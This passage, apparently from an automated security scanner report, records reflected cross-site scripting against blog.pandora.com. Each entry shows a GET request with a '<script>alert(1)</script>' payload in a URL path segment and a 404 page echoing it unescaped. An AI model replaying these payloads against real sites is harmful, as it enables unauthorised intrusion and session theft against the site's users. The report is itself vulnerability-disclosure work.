GET /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:51 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/coloradof5a5f<script>alert(1)</script>64acfed229b/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>0d232e15ba4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:55 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora84903<script>alert(1)</script>0d232e15ba4/archives/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc611<script>alert(1)</script>144240895da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesfc611<script>alert(1)</script>144240895da/florida/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2e2a<script>alert(1)</script>2320b502118 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/floridac2e2a<script>alert(1)</script>2320b502118/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f19a8<script>alert(1)</script>5f361df41b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:50 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf19a8<script>alert(1)</script>5f361df41b9/archives/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9bc1a<script>alert(1)</script>bc0dd599e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9bc1a<script>alert(1)</script>bc0dd599e1c/georgia/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b929c<script>alert(1)</script>ae5fbffaaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/georgiab929c<script>alert(1)</script>ae5fbffaaf/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 937ab<script>alert(1)</script>11ad1856e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora937ab<script>alert(1)</script>11ad1856e10/archives/illinois/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload aecb2<script>alert(1)</script>bbd3bee6ead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesaecb2<script>alert(1)</script>bbd3bee6ead/illinois/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 37ffe<script>alert(1)</script>8413af64462 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/illinois37ffe<script>alert(1)</script>8413af64462/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba293<script>alert(1)</script>35298219914 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraba293<script>alert(1)</script>35298219914/archives/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11e99<script>alert(1)</script>0ea477101ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives11e99<script>alert(1)</script>0ea477101ec/images/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f474<script>alert(1)</script>abd6920173d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images6f474<script>alert(1)</script>abd6920173d/map.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b4bae<script>alert(1)</script>09286fec01b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/images/map.htmlb4bae<script>alert(1)</script>09286fec01b was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c18ce<script>alert(1)</script>7ecc04df193 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorac18ce<script>alert(1)</script>7ecc04df193/archives/indiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8819<script>alert(1)</script>89fc3a9ebb4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:54 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf8819<script>alert(1)</script>89fc3a9ebb4/indiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6554d<script>alert(1)</script>6f5884afdfb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/indiana6554d<script>alert(1)</script>6f5884afdfb/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bd390<script>alert(1)</script>573c7e0b3bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:57 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabd390<script>alert(1)</script>573c7e0b3bc/archives/louisiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d4792<script>alert(1)</script>859bb1e33f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd4792<script>alert(1)</script>859bb1e33f2/louisiana/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4595a<script>alert(1)</script>14a7a2da08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/louisiana4595a<script>alert(1)</script>14a7a2da08/ was not found on this server.</p> ...[SNIP]...
